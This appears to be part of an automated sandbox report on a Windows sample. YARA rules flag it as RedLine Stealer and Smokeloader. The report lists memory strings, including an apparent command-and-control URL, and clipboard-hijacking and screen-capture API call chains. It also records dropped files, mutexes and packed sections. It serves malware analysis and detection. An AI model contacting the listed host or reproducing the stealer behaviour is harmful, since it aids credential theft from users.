    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://versersleep.shop:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknown HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep, 0_2_004016DF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_02101942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep, 0_2_02101942
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe Code function: 2_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject, 2_2_00436980

    System Summary

    Source: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_02102357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC, 0_2_02102357
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe Code function: 0_2_021025FB NtdllDefWindowProc_W,PostQuitMessage, 0_2_021025FB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021631572_2_02163157
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217C1482_2_0217C148
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021841662_2_02184166
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021881972_2_02188197
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217B18B2_2_0217B18B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021666272_2_02166627
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217C6672_2_0217C667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217D6672_2_0217D667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219268D2_2_0219268D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021946A42_2_021946A4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A26D72_2_021A26D7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021977122_2_02197712
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219572B2_2_0219572B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219A7562_2_0219A756
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216D7AC2_2_0216D7AC
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021724422_2_02172442
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021784C22_2_021784C2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021645172_2_02164517
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021695072_2_02169507
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021685C72_2_021685C7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021825E72_2_021825E7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A2A172_2_021A2A17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02190A752_2_02190A75
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219FA872_2_0219FA87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02166AB72_2_02166AB7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02179AA72_2_02179AA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219BAD72_2_0219BAD7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02168AE72_2_02168AE7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02177AE42_2_02177AE4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02163B672_2_02163B67
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02193B972_2_02193B97
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02199B8A2_2_02199B8A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02171BB62_2_02171BB6
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219C8072_2_0219C807
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021968772_2_02196877
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021678872_2_02167887
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217A8F72_2_0217A8F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217F9372_2_0217F937
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021699F72_2_021699F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218EE1A2_2_0218EE1A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218EE082_2_0218EE08
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218BE072_2_0218BE07
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218DE572_2_0218DE57
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02174E872_2_02174E87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217DF172_2_0217DF17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219AF172_2_0219AF17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218FF232_2_0218FF23
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02194F562_2_02194F56
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02195F7A2_2_02195F7A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A2F872_2_021A2F87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02177FFA2_2_02177FFA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02180FF72_2_02180FF7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216EC172_2_0216EC17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218ECC92_2_0218ECC9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A2CC72_2_021A2CC7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216CCC92_2_0216CCC9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02165D172_2_02165D17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217DD372_2_0217DD37
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02162D872_2_02162D87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02192D8B2_2_02192D8B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219CDA72_2_0219CDA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02197DD02_2_02197DD0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218EDC62_2_0218EDC6
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe 9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe 9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: String function: 00410710 appears 53 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: String function: 02110977 appears 53 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: String function: 0211000F appears 121 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: String function: 0040FDA8 appears 125 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: String function: 0040F8F9 appears 36 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: String function: 00414C10 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: String function: 02174E77 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: String function: 021683D7 appears 77 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: String function: 00408170 appears 45 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884
    Source: L7GNkeVm5e.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: L7GNkeVm5e.exe | Binary or memory string: OriginalFileName vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exe, 00000000.00000003.2103321400.0000000002170000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exe, 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: L7GNkeVm5e.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: EB86.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@11/3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_00629FB6 CreateToolhelp32Snapshot,Module32First
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Code function: 2_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htm
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Mutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess412
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | File created: C:\Users\user\AppData\Local\Temp\EB86.tmp
    Source: L7GNkeVm5e.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: L7GNkeVm5e.exe | Virustotal: Detection: 39%
    Source: L7GNkeVm5e.exe | ReversingLabs: Detection: 50%
    Source: unknown | Process created: C:\Users\user\Desktop\L7GNkeVm5e.exe "C:\Users\user\Desktop\L7GNkeVm5e.exe"
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Process created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe"
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Process created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe"
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: msimg32.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: msvcr100.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: edputil.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: appresolver.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: bcp47langs.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: slc.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: sppc.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: pcacli.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: mpr.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Section loaded: sfc_os.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: msimg32.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: msvcr100.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: webio.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: schannel.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: Binary string: .pDB~B source: L7GNkeVm5e.exe

    Data Obfuscation

    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Unpacked PE file: 0.2.L7GNkeVm5e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.vakolu:W;.devuwi:W;.pogezal:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Unpacked PE file: 2.2.EB86.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nosu:W;.muwav:W;.roxah:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Unpacked PE file: 0.2.L7GNkeVm5e.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | Unpacked PE file: 2.2.EB86.tmp.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe | Code function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
    Source: L7GNkeVm5e.exe | Static PE information: section name: .vakolu
    Source: L7GNkeVm5e.exe | Static PE information: section name: .devuwi
    Source: L7GNkeVm5e.exe | Static PE information: section name: .pogezal
    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .nosu
